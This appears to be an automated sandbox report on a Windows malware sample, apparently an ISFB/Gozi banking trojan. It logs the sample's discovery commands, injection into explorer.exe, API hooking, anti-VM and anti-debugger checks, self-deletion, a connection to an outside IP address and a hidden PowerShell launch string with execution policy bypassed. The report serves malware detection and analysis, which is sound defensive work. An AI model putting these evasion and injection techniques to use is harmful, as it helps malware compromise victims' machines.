Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\driverquery.exe driverquery.exe	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\reg.exe reg.exe query 'HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall' /s	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\reg.exe reg.exe query 'HKLM\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall' /s

Uses an in-process (OLE) Automation server

Show sources

Source: C:\Windows\explorer.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0bf754aa-c967-445c-ab3d-d8fda9bae7ef}\InProcServer32

Jump to behavior

Uses systeminfo.exe to query system information

Show sources

Source: unknown

Process created: C:\Windows\System32\systeminfo.exe systeminfo.exe

Uses tasklist.exe to query information about running processes

Show sources

Source: unknown

Process created: C:\Windows\System32\tasklist.exe tasklist.exe /SVC

Checks if Microsoft Office is installed

Show sources

Source: C:\Windows\explorer.exe

Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\Outlook\OMI Account Manager\Accounts

Jump to behavior

Submission file is bigger than most known malware samples

Show sources

Source: rb5iJg6pgN.exe

Static file information: File size 1158144 > 1048576

Uses new MSVCR Dlls

Show sources

Source: C:\Windows\explorer.exe

File opened: C:\Windows\WinSxS\x86_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_50916076bcb9a742\MSVCR90.dll

Jump to behavior

Binary contains paths to debug symbols

Show sources

Source:

Binary string: c:\isfb3\release\client.pdb source: explorer.exe

PE file contains a valid data directory to section mapping

Show sources

Source: rb5iJg6pgN.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
Source: rb5iJg6pgN.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
Source: rb5iJg6pgN.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
Source: rb5iJg6pgN.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
Source: rb5iJg6pgN.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata

Data Obfuscation:

Contains functionality to dynamically determine API calls

Show sources

Source: C:\Users\user\Desktop\rb5iJg6pgN.exe

Code function: 0_1_00444365 EncodePointer,EncodePointer,LoadLibraryExW,GetLastError,LoadLibraryW,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,IsDebuggerPresent,OutputDebugStringW,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,

0_1_00444365

Uses code obfuscation techniques (call, push, ret)

Show sources

Source: C:\Users\user\Desktop\rb5iJg6pgN.exe	Code function: 0_2_004041F3 push ecx; ret	0_2_00404203
Source: C:\Users\user\Desktop\rb5iJg6pgN.exe	Code function: 0_2_002C0C9B push edi; ret	0_2_002C0CD2
Source: C:\Users\user\Desktop\rb5iJg6pgN.exe	Code function: 0_1_00439215 push ecx; ret	0_1_00439228
Source: C:\Users\user\Desktop\rb5iJg6pgN.exe	Code function: 0_1_0040533E push edx; ret	0_1_00405341
Source: C:\Users\user\Desktop\rb5iJg6pgN.exe	Code function: 0_1_00432414 push eax; ret	0_1_00432432
Source: C:\Users\user\Desktop\rb5iJg6pgN.exe	Code function: 0_1_00436D8A push ecx; ret	0_1_00436D9D
Source: C:\Windows\explorer.exe	Code function: 2_2_0064027A push ecx; ret	2_2_0064028A
Source: C:\Windows\explorer.exe	Code function: 2_2_0156D0AB push ecx; ret	2_2_0156D0BB
Source: C:\Windows\explorer.exe	Code function: 2_2_015A0839 push ecx; ret	2_2_015A0849
Source: C:\Windows\explorer.exe	Code function: 2_2_015BD374 push eax; iretd	2_2_015BD395
Source: C:\Windows\explorer.exe	Code function: 2_2_015CD303 push ecx; ret	2_2_015CD313

Persistence and Installation Behavior:

Searches for installed JRE in non-default directory

Show sources

Source: C:\Windows\explorer.exe	File opened: C:\Users\user\AppData\Roaming\.jre\ read data or list directory \| synchronize	Jump to behavior
Source: C:\Windows\explorer.exe	File opened: C:\Users\user\AppData\Roaming\.jre\bin\ read data or list directory \| synchronize	Jump to behavior
Source: C:\Windows\explorer.exe	File opened: C:\Users\user\AppData\Roaming\.jre\bin\client\ read data or list directory \| synchronize	Jump to behavior
Source: C:\Windows\explorer.exe	File opened: C:\Users\user\AppData\Roaming\.jre\bin\dtplugin\ read data or list directory \| synchronize	Jump to behavior
Source: C:\Windows\explorer.exe	File opened: C:\Users\user\AppData\Roaming\.jre\bin\plugin2\ read data or list directory \| synchronize	Jump to behavior
Source: C:\Windows\explorer.exe	File opened: C:\Users\user\AppData\Roaming\.jre\lib\ read data or list directory \| synchronize	Jump to behavior
Source: C:\Windows\explorer.exe	File opened: C:\Users\user\AppData\Roaming\.jre\lib\applet\ read data or list directory \| synchronize	Jump to behavior
Source: C:\Windows\explorer.exe	File opened: C:\Users\user\AppData\Roaming\.jre\lib\cmm\ read data or list directory \| synchronize	Jump to behavior
Source: C:\Windows\explorer.exe	File opened: C:\Users\user\AppData\Roaming\.jre\lib\deploy\ read data or list directory \| synchronize	Jump to behavior
Source: C:\Windows\explorer.exe	File opened: C:\Users\user\AppData\Roaming\.jre\lib\ext\ read data or list directory \| synchronize	Jump to behavior
Source: C:\Windows\explorer.exe	File opened: C:\Users\user\AppData\Roaming\.jre\lib\fonts\ read data or list directory \| synchronize	Jump to behavior
Source: C:\Windows\explorer.exe	File opened: C:\Users\user\AppData\Roaming\.jre\lib\i386\ read data or list directory \| synchronize	Jump to behavior
Source: C:\Windows\explorer.exe	File opened: C:\Users\user\AppData\Roaming\.jre\lib\images\ read data or list directory \| synchronize	Jump to behavior
Source: C:\Windows\explorer.exe	File opened: C:\Users\user\AppData\Roaming\.jre\lib\images\cursors\ read data or list directory \| synchronize	Jump to behavior
Source: C:\Windows\explorer.exe	File opened: C:\Users\user\AppData\Roaming\.jre\lib\jfr\ read data or list directory \| synchronize	Jump to behavior
Source: C:\Windows\explorer.exe	File opened: C:\Users\user\AppData\Roaming\.jre\lib\management\ read data or list directory \| synchronize	Jump to behavior
Source: C:\Windows\explorer.exe	File opened: C:\Users\user\AppData\Roaming\.jre\lib\security\ read data or list directory \| synchronize	Jump to behavior
Source: C:\Windows\explorer.exe	File opened: C:\Users\user\AppData\Roaming\.jre\lib\security\policy\ read data or list directory \| synchronize	Jump to behavior
Source: C:\Windows\explorer.exe	File opened: C:\Users\user\AppData\Roaming\.jre\lib\security\policy\limited\ read data or list directory \| synchronize	Jump to behavior
Source: C:\Windows\explorer.exe	File opened: C:\Users\user\AppData\Roaming\.jre\lib\security\policy\unlimited\ read data or list directory \| synchronize	Jump to behavior

Boot Survival:

Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)

Show sources

Source: C:\Windows\explorer.exe	Window found: window name: ProgMan			Jump to behavior
Source: C:\Windows\explorer.exe	Window found: window name: ProgMan			Jump to behavior

Hooking and other Techniques for Hiding and Protection:

Deletes itself after installation

Show sources

Source: C:\Windows\explorer.exe

File deleted: c:\users\user\desktop\rb5ijg6pgn.exe

Jump to behavior

Modifies the export address table of user mode modules (user mode EAT hooks)

Show sources

Source: explorer.exe

IAT of a user mode module has changed: module: kernel32.dll function: CreateProcessW address: 773C9000

Modifies the import address table of user mode modules (user mode IAT hooks)

Show sources

Source: explorer.exe

EAT of a user mode module has changed: module: USER32.dll function: KERNEL32.dll:CreateProcessW address: 51BB9C1

Modifies the prolog of user mode functions (user mode inline hooks)

Show sources

Source: explorer.exe

User mode code has changed: module: kernel32.dll function: CreateProcessW new code: 0xE9 0x9B 0xBC 0xC2 0x29 0x9D

Extensive use of GetProcAddress (often used to hide API calls)

Show sources

Source: C:\Users\user\Desktop\rb5iJg6pgN.exe

Code function: 0_1_004315C9 RtlEncodePointer,__initp_misc_winsig,GetModuleHandleW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,

0_1_004315C9

Disables application error messsages (SetErrorMode)

Show sources

Source: C:\Users\user\Desktop\rb5iJg6pgN.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\rb5iJg6pgN.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior

Malware Analysis System Evasion:

Contains functionality to detect hardware virtualization (CPUID execution measurement)

Show sources

Source: C:\Users\user\Desktop\rb5iJg6pgN.exe

Code function: 0_2_00401260 GetModuleHandleA,Sleep,_aulldiv,

0_2_00401260

Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)

Show sources

Source: C:\Windows\System32\systeminfo.exe

WMI Queries: IWbemServices::CreateInstanceEnum - Win32_BIOS

Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)

Show sources

Source: C:\Windows\System32\systeminfo.exe

WMI Queries: IWbemServices::CreateInstanceEnum - Win32_NetworkAdapter

Tries to detect virtualization through RDTSC time measurements

Show sources

Source: C:\Users\user\Desktop\rb5iJg6pgN.exe

RDTSC instruction interceptor: First address: 401278 second address: 401292 instructions: 0x00000000 rdtsc 0x00000002 mov dword ptr [ebp-08h], eax 0x00000005 mov dword ptr [ebp-04h], edx 0x00000008 mov esi, dword ptr [ebp-04h] 0x0000000b mov eax, dword ptr [ebp-08h] 0x0000000e xor edi, edi 0x00000010 xor ecx, ecx 0x00000012 or edi, eax 0x00000014 or esi, ecx 0x00000016 xor eax, eax 0x00000018 cpuid 0x0000001a rdtsc

Contains functionality for execution timing, often used to detect debuggers

Show sources

Source: C:\Users\user\Desktop\rb5iJg6pgN.exe

Code function: 0_2_00401260 rdtsc

0_2_00401260

Contains functionality to read device registry values (via SetupAPI)

Show sources

Source: C:\Users\user\Desktop\rb5iJg6pgN.exe

Code function: 0_2_00401453 GetModuleHandleA,SetupDiGetClassDevsA,SetupDiEnumDeviceInfo,SetupDiGetDeviceRegistryPropertyA,SetupDiGetDeviceRegistryPropertyA,SetupDiGetDeviceRegistryPropertyA,SetupDiDestroyDeviceInfoList,

0_2_00401453

Contains long sleeps (>= 3 min)

Show sources

Source: C:\Users\user\Desktop\rb5iJg6pgN.exe	Thread delayed: delay time: 5000000	Jump to behavior
Source: C:\Users\user\Desktop\rb5iJg6pgN.exe	Thread delayed: delay time: 1000000	Jump to behavior
Source: C:\Windows\explorer.exe	Thread delayed: delay time: 1000000	Jump to behavior

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Show sources

Source: C:\Windows\explorer.exe	Window / User API: threadDelayed 1687			Jump to behavior
Source: C:\Windows\explorer.exe	Window / User API: foregroundWindowGot 450			Jump to behavior

Found large amount of non-executed APIs

Show sources

Source: C:\Windows\explorer.exe

API coverage: 4.1 %

May sleep (evasive loops) to hinder dynamic analysis

Show sources

Source: C:\Users\user\Desktop\rb5iJg6pgN.exe TID: 1724	Thread sleep time: -500000s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\rb5iJg6pgN.exe TID: 1724	Thread sleep time: -50000000s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\rb5iJg6pgN.exe TID: 1724	Thread sleep time: -1000000s >= -30000s	Jump to behavior
Source: C:\Windows\explorer.exe TID: 1720	Thread sleep time: -1000000s >= -30000s	Jump to behavior
Source: C:\Windows\explorer.exe TID: 3712	Thread sleep count: 1687 > 30	Jump to behavior
Source: C:\Windows\explorer.exe TID: 3712	Thread sleep time: -1012200000000s >= -30000s	Jump to behavior
Source: C:\Windows\explorer.exe TID: 3716	Thread sleep count: 32 > 30	Jump to behavior
Source: C:\Windows\explorer.exe TID: 3328	Thread sleep time: -5000000s >= -30000s	Jump to behavior
Source: C:\Windows\explorer.exe TID: 3712	Thread sleep time: -600000000s >= -30000s	Jump to behavior
Source: C:\Windows\System32\systeminfo.exe TID: 1400	Thread sleep time: -2400000000s >= -30000s	Jump to behavior
Source: C:\Windows\System32\systeminfo.exe TID: 1400	Thread sleep time: -600000000s >= -30000s	Jump to behavior
Source: C:\Windows\System32\tasklist.exe TID: 1500	Thread sleep time: -600000000s >= -30000s	Jump to behavior
Source: C:\Windows\System32\tasklist.exe TID: 1500	Thread sleep time: -600000000s >= -30000s	Jump to behavior
Source: C:\Windows\System32\driverquery.exe TID: 3484	Thread sleep time: -1200000000s >= -30000s	Jump to behavior
Source: C:\Windows\System32\driverquery.exe TID: 3484	Thread sleep time: -600000000s >= -30000s	Jump to behavior

Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)

Show sources

Source: C:\Windows\System32\systeminfo.exe

WMI Queries: IWbemServices::CreateInstanceEnum - Win32_Processor

Contains functionality to enumerate / list files inside a directory

Show sources

Source: C:\Windows\explorer.exe	Code function: 2_2_01552003 FindFirstFileA,lstrcpy,GetFileAttributesA,mbstowcs,FindNextFileA,FindClose,	2_2_01552003
Source: C:\Windows\explorer.exe	Code function: 2_2_01560022 memset,FindFirstFileW,memset,wcscpy,RtlEnterCriticalSection,RtlLeaveCriticalSection,FindNextFileW,WaitForSingleObject,FindClose,FindFirstFileW,FindNextFileW,WaitForSingleObject,FindClose,	2_2_01560022
Source: C:\Windows\explorer.exe	Code function: 2_2_015568A7 memset,FindFirstFileW,LocalFree,FindNextFileW,FindClose,LocalFree,	2_2_015568A7
Source: C:\Windows\explorer.exe	Code function: 2_2_01560316 FindFirstFileW,WaitForSingleObject,FindNextFileW,FindClose,	2_2_01560316
Source: C:\Windows\explorer.exe	Code function: 2_2_0156048A FindFirstFileW,RemoveDirectoryW,DeleteFileW,FindNextFileW,GetLastError,FindClose,	2_2_0156048A
Source: C:\Windows\explorer.exe	Code function: 2_2_01541FF9 RtlAllocateHeap,TerminateProcess,CloseHandle,FindFirstFileW,lstrlenW,RtlAllocateHeap,lstrcpyW,lstrcpyW,DeleteFileW,FindNextFileW,FindClose,HeapFree,FindFirstFileW,lstrlenW,RtlAllocateHeap,lstrcpyW,lstrcpyW,FindNextFileW,FindClose,HeapFree,RtlAllocateHeap,lstrcpyW,TerminateProcess,CloseHandle,lstrcpyW,DeleteFileW,HeapFree,HeapFree,	2_2_01541FF9

Contains functionality to query local drives

Show sources

Source: C:\Windows\explorer.exe

2_2_0154C557

Contains functionality to query system information

Show sources

Source: C:\Windows\explorer.exe

Code function: 2_2_0155FACA GetSystemInfo,

2_2_0155FACA

May try to detect the virtual machine to hinder analysis (VM artifact strings found in memory)

Show sources

Source: rb5iJg6pgN.exe	Binary or memory string: virtual hd
Source: rb5iJg6pgN.exe	Binary or memory string: vmware
Source: explorer.exe, 00000003.00000000.1511733570.043DF000.00000004.sdmp	Binary or memory string: vmbusres.dll
Source: rb5iJg6pgN.exe, 00000000.00000002.1500032102.00406000.00000004.sdmp	Binary or memory string: 64RtlSetUnhandledExceptionFilterAppDataLowSystemRootLdrGetProcedureAddress.RtlExitUserThreadLdrLoadDllZwProtectVirtualMemoryLow\vboxqemuvmwarevirtual hdResumeThreadSuspendThreadProgMan

Program exit points

Show sources

Source: C:\Windows\explorer.exe

API call chain: ExitProcess graph end node

graph_2-33693

Queries a list of all running processes

Show sources

Source: C:\Windows\explorer.exe

Process information queried: ProcessInformation

Jump to behavior

Anti Debugging:

Checks for kernel debuggers (NtQuerySystemInformation(SystemKernelDebuggerInformation))

Show sources

Source: C:\Windows\System32\systeminfo.exe

System information queried: KernelDebuggerInformation

Jump to behavior

Contains functionality for execution timing, often used to detect debuggers

Show sources

Source: C:\Users\user\Desktop\rb5iJg6pgN.exe

Code function: 0_2_00401260 rdtsc

0_2_00401260

Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Show sources

Source: C:\Users\user\Desktop\rb5iJg6pgN.exe

Code function: 0_2_00403188 LdrLoadDll,LdrGetProcedureAddress,NtProtectVirtualMemory,GetModuleHandleA,memcpy,

0_2_00403188

Contains functionality to check if a debugger is running (IsDebuggerPresent)

Show sources

Source: C:\Users\user\Desktop\rb5iJg6pgN.exe

0_1_00444365

Contains functionality to check if a debugger is running (OutputDebugString,GetLastError)

Show sources

Source: C:\Users\user\Desktop\rb5iJg6pgN.exe

0_1_00444365

Contains functionality to dynamically determine API calls

Show sources

Source: C:\Users\user\Desktop\rb5iJg6pgN.exe

0_1_00444365

Contains functionality to read the PEB

Show sources

Source: C:\Users\user\Desktop\rb5iJg6pgN.exe	Code function: 0_2_002C215E mov eax, dword ptr fs:[00000030h]	0_2_002C215E
Source: C:\Users\user\Desktop\rb5iJg6pgN.exe	Code function: 0_2_002C0000 mov eax, dword ptr fs:[00000030h]	0_2_002C0000
Source: C:\Users\user\Desktop\rb5iJg6pgN.exe	Code function: 0_2_002C04C7 mov eax, dword ptr fs:[00000030h]	0_2_002C04C7

Contains functionality which may be used to detect a debugger (GetProcessHeap)

Show sources

Source: C:\Users\user\Desktop\rb5iJg6pgN.exe

Code function: 0_1_0044C3FA __lseeki64_nolock,__lseeki64_nolock,GetProcessHeap,HeapAlloc,__setmode_nolock,__setmode_nolock,GetProcessHeap,HeapFree,__lseeki64_nolock,SetEndOfFile,GetLastError,__lseeki64_nolock,

0_1_0044C3FA

Enables debug privileges

Show sources

Source: C:\Windows\System32\tasklist.exe

Process token adjusted: Debug

Jump to behavior

Contains functionality to register its own exception handler

Show sources

Source: C:\Users\user\Desktop\rb5iJg6pgN.exe	Code function: 0_1_00437BC3 SetUnhandledExceptionFilter,	0_1_00437BC3
Source: C:\Users\user\Desktop\rb5iJg6pgN.exe	Code function: 0_1_00437BE6 SetUnhandledExceptionFilter,UnhandledExceptionFilter,	0_1_00437BE6
Source: C:\Windows\explorer.exe	Code function: 2_2_01556306 lstrlenW,ExitProcess,GetCurrentProcessId,CreateEventA,GetLastError,SetEvent,Sleep,ResetEvent,CloseHandle,CreateEventA,RtlAddVectoredExceptionHandler,GetLastError,RtlRemoveVectoredExceptionHandler,WaitForSingleObject,	2_2_01556306

HIPS / PFW / Operating System Protection Evasion:

System process connects to network (likely due to code injection or exploit)

Show sources

Source: C:\Windows\explorer.exe

Network Connect: 5.188.60.53 187

Jump to behavior

Allocates memory in foreign processes

Show sources

Source: C:\Users\user\Desktop\rb5iJg6pgN.exe	Memory allocated: C:\Windows\explorer.exe base: 640000 protect: page execute and read and write			Jump to behavior
Source: C:\Windows\explorer.exe	Memory allocated: C:\Windows\explorer.exe base: 2D60000 protect: page execute and read and write			Jump to behavior

Changes memory attributes in foreign processes to executable or writable

Show sources

Source: C:\Windows\explorer.exe	Memory protected: C:\Windows\explorer.exe base: 7778F515 protect: page execute and read and write	Jump to behavior
Source: C:\Windows\explorer.exe	Memory protected: C:\Windows\explorer.exe base: 7778F515 protect: page execute read	Jump to behavior
Source: C:\Windows\explorer.exe	Memory protected: C:\Windows\explorer.exe base: 7778F515 protect: page execute and read and write	Jump to behavior
Source: C:\Windows\explorer.exe	Memory protected: C:\Windows\explorer.exe base: 7778F515 protect: page execute read	Jump to behavior

Creates a thread in another existing process (thread injection)

Show sources

Source: C:\Windows\explorer.exe

Thread created: C:\Windows\explorer.exe EIP: 7778F515

Jump to behavior

Injects code into the Windows Explorer (explorer.exe)

Show sources

Source: C:\Users\user\Desktop\rb5iJg6pgN.exe	Memory written: PID: 2752 base: 50000 value: 01	Jump to behavior
Source: C:\Users\user\Desktop\rb5iJg6pgN.exe	Memory written: PID: 2752 base: 50020 value: 9A	Jump to behavior
Source: C:\Users\user\Desktop\rb5iJg6pgN.exe	Memory written: PID: 2752 base: 7FFD7238 value: 00	Jump to behavior
Source: C:\Users\user\Desktop\rb5iJg6pgN.exe	Memory written: PID: 2752 base: A102D value: EB	Jump to behavior
Source: C:\Users\user\Desktop\rb5iJg6pgN.exe	Memory written: PID: 2752 base: 640000 value: 2D	Jump to behavior
Source: C:\Users\user\Desktop\rb5iJg6pgN.exe	Memory written: PID: 2752 base: A102D value: E8	Jump to behavior
Source: C:\Windows\explorer.exe	Memory written: PID: 3692 base: 7778F515 value: EB	Jump to behavior
Source: C:\Windows\explorer.exe	Memory written: PID: 3692 base: 2D60000 value: 15	Jump to behavior
Source: C:\Windows\explorer.exe	Memory written: PID: 3692 base: 7778F515 value: 8B	Jump to behavior

Maps a DLL or memory area into another process

Show sources

Source: C:\Users\user\Desktop\rb5iJg6pgN.exe

Section loaded: unknown target pid: 2752 protection: execute and read and write

Jump to behavior

Modifies the context of a thread in another process (thread injection)

Show sources

Source: C:\Users\user\Desktop\rb5iJg6pgN.exe	Thread register set: target process: 2752			Jump to behavior
Source: C:\Windows\explorer.exe	Thread register set: target process: 3692			Jump to behavior

Writes to foreign memory regions

Show sources

Source: C:\Users\user\Desktop\rb5iJg6pgN.exe	Memory written: C:\Windows\explorer.exe base: A102D	Jump to behavior
Source: C:\Users\user\Desktop\rb5iJg6pgN.exe	Memory written: C:\Windows\explorer.exe base: 640000	Jump to behavior
Source: C:\Users\user\Desktop\rb5iJg6pgN.exe	Memory written: C:\Windows\explorer.exe base: A102D	Jump to behavior
Source: C:\Windows\explorer.exe	Memory written: C:\Windows\explorer.exe base: 7778F515	Jump to behavior
Source: C:\Windows\explorer.exe	Memory written: C:\Windows\explorer.exe base: 2D60000	Jump to behavior
Source: C:\Windows\explorer.exe	Memory written: C:\Windows\explorer.exe base: 7778F515	Jump to behavior

Creates a process in suspended mode (likely to inject code)

Show sources

Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\systeminfo.exe systeminfo.exe	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\net.exe net view	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\nslookup.exe nslookup 127.0.0.1	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\tasklist.exe tasklist.exe /SVC	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\driverquery.exe driverquery.exe	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\reg.exe reg.exe query 'HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall' /s	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\reg.exe reg.exe query 'HKLM\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall' /s

May try to detect the Windows Explorer process (often used for injection)

Show sources

Source: explorer.exe, 00000002.00000002.1544224987.01596000.00000004.sdmp	Binary or memory string: ExceptionCode = 0x%x\dump.dmpDBGHELP.DLLMiniDumpWriteDumpFullReplaceOffGetWindowThreadProcessIdProgManUSER32.DLL\Explorer\Shell Folders\*.dll%systemroot%\system32\c_1252.nls.exe.dll.lnkpowershell-NoLogo -NonInteractive -WindowStyle Hidden -ExecutionPolicy bypass -File "%s"AppDataGIF87a89a!
Source: explorer.exe, 00000003.00000000.1500326584.00830000.00000002.sdmp	Binary or memory string: Program Manager
Source: explorer.exe, 00000003.00000000.1500326584.00830000.00000002.sdmp	Binary or memory string: Progman
Source: explorer.exe, 00000003.00000000.1500326584.00830000.00000002.sdmp	Binary or memory string: Shell_TrayWnd
Source: rb5iJg6pgN.exe, explorer.exe, 00000002.00000002.1544224987.01596000.00000004.sdmp	Binary or memory string: ProgMan
Source: rb5iJg6pgN.exe, 00000000.00000002.1500032102.00406000.00000004.sdmp	Binary or memory string: 64RtlSetUnhandledExceptionFilterAppDataLowSystemRootLdrGetProcedureAddress.RtlExitUserThreadLdrLoadDllZwProtectVirtualMemoryLow\vboxqemuvmwarevirtual hdResumeThreadSuspendThreadProgMan
Source: explorer.exe, 00000003.00000000.1499760778.004AD000.00000004.sdmp	Binary or memory string: Progmanp

Language, Device and Operating System Detection:

Contains functionality locales information (e.g. system language)

Show sources

Source: C:\Users\user\Desktop\rb5iJg6pgN.exe	Code function: GetLocaleInfoW,	0_1_004381D2
Source: C:\Users\user\Desktop\rb5iJg6pgN.exe	Code function: EnumSystemLocalesW,	0_1_00438195
Source: C:\Users\user\Desktop\rb5iJg6pgN.exe	Code function: __calloc_crt,__malloc_crt,_free,__malloc_crt,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___free_lconv_num,_free,_free,InterlockedDecrement,InterlockedDecrement,_free,_free,	0_1_004452B3
Source: C:\Users\user\Desktop\rb5iJg6pgN.exe	Code function: _LocaleUpdate::_LocaleUpdate,__crtGetLocaleInfoA_stat,	0_1_0044461F
Source: C:\Users\user\Desktop\rb5iJg6pgN.exe	Code function: _TranslateName,_GetLocaleNameFromLangCountry,_GetLocaleNameFromLanguage,_TranslateName,_GetLocaleNameFromLangCountry,_GetLocaleNameFromLanguage,_GetLocaleNameFromDefault,IsValidCodePage,_wcschr,_wcschr,__itow_s,__invoke_watson,GetLocaleInfoW,	0_1_004466C2
Source: C:\Users\user\Desktop\rb5iJg6pgN.exe	Code function: GetLocaleInfoW,	0_1_00446884
Source: C:\Users\user\Desktop\rb5iJg6pgN.exe	Code function: ___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___ge	0_1_004458B7
Source: C:\Users\user\Desktop\rb5iJg6pgN.exe	Code function: _GetPrimaryLen,EnumSystemLocalesW,	0_1_00446972
Source: C:\Users\user\Desktop\rb5iJg6pgN.exe	Code function: EnumSystemLocalesW,	0_1_00446932
Source: C:\Users\user\Desktop\rb5iJg6pgN.exe	Code function: _GetPrimaryLen,EnumSystemLocalesW,	0_1_004469EF
Source: C:\Users\user\Desktop\rb5iJg6pgN.exe	Code function: GetLocaleInfoW,GetLocaleInfoW,__wcsnicmp,GetLocaleInfoW,	0_1_00446A72
Source: C:\Users\user\Desktop\rb5iJg6pgN.exe	Code function: GetLocaleInfoW,	0_1_00446C65
Source: C:\Users\user\Desktop\rb5iJg6pgN.exe	Code function: _wcscmp,_wcscmp,GetLocaleInfoW,GetLocaleInfoW,GetACP,	0_1_00446D8D
Source: C:\Users\user\Desktop\rb5iJg6pgN.exe	Code function: GetLocaleInfoW,_GetPrimaryLen,	0_1_00446E3A
